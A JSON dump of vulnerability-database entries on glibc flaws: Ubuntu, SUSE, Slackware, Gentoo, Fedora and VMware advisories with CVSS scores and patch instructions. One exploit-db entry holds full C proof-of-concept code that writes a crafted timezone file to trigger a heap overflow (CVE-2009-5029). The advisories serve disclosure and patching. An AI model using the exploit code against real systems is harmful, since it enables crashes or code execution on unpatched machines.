possible\r\nin the GNU C Library fnmatch() code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. (CVE-2011-1659)\r\n\r\nDan Rosenberg discovered that the addmntent() function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. 
This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1095)\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. (CVE-2011-1658)\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3)\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call (RPC)\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. (CVE-2011-4609)\r\n\r\nIt was discovered that the GNU C Library vfprintf() implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. 
(CVE-2012-0864)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "title": "[USN-1396-1] GNU C Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-0296", "CVE-2010-0830"], "description": "Invalid mntent functions string processing, ELF format parsing memory corruption.", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:VULN:10874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10874", "title": "GNU glibc library security vulnerabilities", "type": 
"securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2011-2702"], "description": "memcpy() integer overflow, RPC DoS, vfprintf() integer overflow.", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12241", "title": "glibc multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6326", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "a. vCenter Server Appliance directory traversal \n \n\n\nThe vCenter Server Appliance (vCSA) contains a directory traversal vulnerability that allows an authenticated remote user to retrieve arbitrary files. Exploitation of this issue may expose sensitive information stored on the server. \n \nVMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-6324 to this issue. 
\n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2013-04-25T00:00:00", "published": "2012-12-20T00:00:00", "id": "VMSA-2012-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0018.html", "title": "VMware security updates for vCSA, vCenter Server, and ESXi", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:30:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "It was discovered that the GNU C Library did not properly handle \ninteger overflows in the timezone handling code. An attacker could use \nthis to possibly execute arbitrary code by convincing an application \nto load a maliciously constructed tzfile. (CVE-2009-5029)\n\nIt was discovered that the GNU C Library did not properly handle \npasswd.adjunct.byname map entries in the Network Information Service \n(NIS) code in the name service caching daemon (nscd). An attacker \ncould use this to obtain the encrypted passwords of NIS accounts. \nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\n\nChris Evans reported that the GNU C Library did not properly \ncalculate the amount of memory to allocate in the fnmatch() code. An \nattacker could use this to cause a denial of service or possibly \nexecute arbitrary code via a maliciously crafted UTF-8 string. \nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1071)\n\nTomas Hoger reported that an additional integer overflow was possible \nin the GNU C Library fnmatch() code. An attacker could use this to \ncause a denial of service via a maliciously crafted UTF-8 string. 
This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 \nand Ubuntu 11.04. (CVE-2011-1659)\n\nDan Rosenberg discovered that the addmntent() function in the GNU C \nLibrary did not report an error status for failed attempts to write to \nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab, \npossibly causing a denial of service or otherwise manipulate mount \noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, \nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\n\nHarald van Dijk discovered that the locale program included with the \nGNU C library did not properly quote its output. This could allow a \nlocal attacker to possibly execute arbitrary code using a crafted \nlocalization string that was evaluated in a shell script. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1095)\n\nIt was discovered that the GNU C library loader expanded the \n$ORIGIN dynamic string token when RPATH is composed entirely of this \ntoken. This could allow an attacker to gain privilege via a setuid \nprogram that had this RPATH value. (CVE-2011-1658)\n\nIt was discovered that the GNU C library implementation of memcpy \noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3) \ncontained a possible integer overflow. An attacker could use this to \ncause a denial of service or possibly execute arbitrary code. This \nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\n\nJohn Zimmerman discovered that the Remote Procedure Call (RPC) \nimplementation in the GNU C Library did not properly handle large \nnumbers of connections. This could allow a remote attacker to cause \na denial of service. (CVE-2011-4609)\n\nIt was discovered that the GNU C Library vfprintf() implementation \ncontained a possible integer overflow in the format string protection \ncode offered by FORTIFY_SOURCE. 
An attacker could use this flaw in \nconjunction with a format string vulnerability to bypass the format \nstring protection and possibly execute arbitrary code. (CVE-2012-0864)", "edition": 5, "modified": "2012-03-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "USN-1396-1", "href": "https://ubuntu.com/security/notices/USN-1396-1", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "New glibc packages are available for Slackware 13.1, 13.37, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/glibc-2.13-i486-5_slack13.37.txz: Rebuilt.\n Patched an overflow in tzfile. This was evidently first reported in\n 2009, but is only now getting around to being patched. To exploit it,\n one must be able to write beneath /usr/share/zoneinfo, which is usually\n not possible for a normal user, but may be in the case where they are\n chroot()ed to a directory that they own.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\n (* Security fix *)\npatches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz: Rebuilt.\npatches/packages/glibc-profile-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz: Rebuilt.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-i18n-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-profile-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-solibs-2.11.1-i486-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-i18n-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-profile-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-solibs-2.11.1-x86_64-6_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-zoneinfo-2.11.1-noarch-6_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-profile-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware x86_64 
13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-i18n-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-profile-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-solibs-2.13-x86_64-5_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.14.1-i486-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.14.1-i486-4.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2011i_2011n-noarch-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.14.1-x86_64-4.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.14.1-x86_64-4.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-2.13-i486-5_slack13.37.txz glibc-i18n-2.13-i486-5_slack13.37.txz glibc-profile-2.13-i486-5_slack13.37.txz glibc-solibs-2.13-i486-5_slack13.37.txz glibc-zoneinfo-2.13-noarch-5_slack13.37.txz", "modified": "2012-02-10T17:44:30", "published": "2012-02-10T17:44:30", "id": "SSA-2012-041-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.806982", "type": "slackware", "title": "[slackware-security] glibc", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T03:26:33", "description": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability. CVE-2009-5029. DoS exploit for linux platform", "published": "2009-06-01T00:00:00", "type": "exploitdb", "title": "GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-5029"], "modified": "2009-06-01T00:00:00", "id": "EDB-ID:36404", "href": "https://www.exploit-db.com/exploits/36404/", "sourceData": "source: http://www.securityfocus.com/bid/50898/info\r\n\r\nGNU glibc is prone to a remote integer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. 
\r\n\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <string.h>\r\n \r\n#define TZ_MAGIC \"TZif\"\r\n \r\n#define PUT_32BIT_MSB(cp, value) \\\r\n do { \\\r\n (cp)[0] = (value) >> 24; \\\r\n (cp)[1] = (value) >> 16; \\\r\n (cp)[2] = (value) >> 8; \\\r\n (cp)[3] = (value); \\\r\n } while (0)\r\n \r\nstruct tzhead {\r\n char tzh_magic[4];\r\n char tzh_version[1];\r\n char tzh_reserved[15];\r\n char tzh_ttisgmtcnt[4];\r\n char tzh_ttisstdcnt[4];\r\n char tzh_leapcnt[4];\r\n char tzh_timecnt[4];\r\n char tzh_typecnt[4];\r\n char tzh_charcnt[4];\r\n};\r\n \r\nstruct ttinfo\r\n {\r\n long int offset;\r\n unsigned char isdst;\r\n unsigned char idx;\r\n unsigned char isstd;\r\n unsigned char isgmt;\r\n };\r\nint main(void)\r\n{\r\n struct tzhead evil;\r\n int i;\r\n char *p;\r\n uint32_t total_size;\r\n uint32_t evil1, evil2;\r\n \r\n /* Initialize static part of the header */\r\n memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);\r\n evil.tzh_version[0] = 0;\r\n memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));\r\n memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));\r\n memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));\r\n memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));\r\n memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));\r\n \r\n /* Initialize nasty part of the header */\r\n evil1 = 500;\r\n PUT_32BIT_MSB(evil.tzh_timecnt, evil1);\r\n \r\n total_size = evil1 * (sizeof(time_t) + 1);\r\n total_size = ((total_size + __alignof__ (struct ttinfo) - 1)\r\n & ~(__alignof__ (struct ttinfo) - 1));\r\n \r\n /* value of chars, to get a malloc(0) */\r\n evil2 = 0 - total_size;\r\n PUT_32BIT_MSB(evil.tzh_charcnt, evil2);\r\n p = (char *)&evil;\r\n for (i = 0; i < sizeof(evil); i++)\r\n printf(\"%c\", p[i]);\r\n \r\n /* data we overflow with */\r\n for (i = 0; i < 50000; i++)\r\n printf(\"A\");\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, 
"sourceHref": "https://www.exploit-db.com/download/36404/"}], "suse": [{"lastseen": "2016-09-04T11:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "Specially crafted time zone files could cause a heap\n overflow in glibc (CVE-2009-5029).\n\n", "edition": 1, "modified": "2012-01-05T19:08:22", "published": "2012-01-05T19:08:22", "id": "OPENSUSE-SU-2012:0064-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00040.html", "title": "glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:09", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:25:46", "published": "2012-01-05T12:25:46", "id": "SUSE-SU-2012:0033-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00032.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:38", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:36:28", "published": "2012-01-05T12:36:28", "id": "SUSE-SU-2012:0055-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00037.html", "type": "suse", "title": "Security update for glibc (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The following bug has been fixed:\n\n * Specially crafted time zone files could cause a 
heap\n overflow in glibc.\n", "edition": 1, "modified": "2012-01-05T12:08:52", "published": "2012-01-05T12:08:52", "id": "SUSE-SU-2012:0023-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00030.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-01-17T20:24:50", "published": "2012-01-17T20:24:50", "id": "FEDORA:D91FC208AA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2009-5029", "CVE-2011-0536", "CVE-2011-1089"], "edition": 1, "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in GNU C Library. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could trigger vulnerabilities in dynamic library loader, making it possible to load attacker-controlled shared objects during execution of setuid/setgid programs to escalate privileges. 
\n\nA context-dependent attacker could trigger various vulnerabilities in GNU C Library, including a buffer overflow, leading to execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU C Library users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.15-r3\"", "modified": "2013-12-03T00:00:00", "published": "2013-12-03T00:00:00", "id": "GLSA-201312-01", "href": "https://security.gentoo.org/glsa/201312-01", "type": "gentoo", "title": "GNU C Library: Multiple vulnerabilities", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}